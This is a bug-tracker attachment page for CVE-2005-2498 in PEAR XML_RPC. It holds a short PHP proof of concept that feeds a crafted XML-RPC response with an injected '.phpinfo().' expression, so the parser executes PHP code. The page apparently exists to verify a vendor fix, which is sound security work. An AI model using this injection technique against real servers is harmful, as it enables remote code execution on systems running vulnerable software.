Bugzilla – Attachment 47336 Details for
Bug 104403
VUL-0: CVE-2005-2498: new pear / RPC:XML problems
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
IDP Log In
|
Forgot Password
modified exploit from last pear problem
rpc.php (text/plain), 451 bytes, created by
Ludwig Nussel
on 2005-08-24 09:41:46 UTC
(
hide
)
Description:
modified exploit from last pear problem
Filename:
MIME Type:
Creator:
Ludwig Nussel
Created:
2005-08-24 09:41:46 UTC
Size:
451 bytes
patch
obsolete
>#!/usr/bin/php ><?php >require_once "PEAR.php"; >require_once "XML/RPC.php"; > >$p = new XML_RPC_Message("foo"); >$e = $p->parseResponse("<?xml version=\"1.0\"?> ><methodResponse> ><params> ><param> ><value> ><struct> ><member><name><name>.phpinfo().</name></name><value></value></member> ></struct> ></value> ></param> ></params> ></methodResponse>"); >if ($e->faultCode()) { > printf("error message: %s\n", $e->faultString()); >} else { > print "no error\n"; >} >?>
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
Actions:
View
Attachments on
bug 104403
:
46004
|
46005
| 47336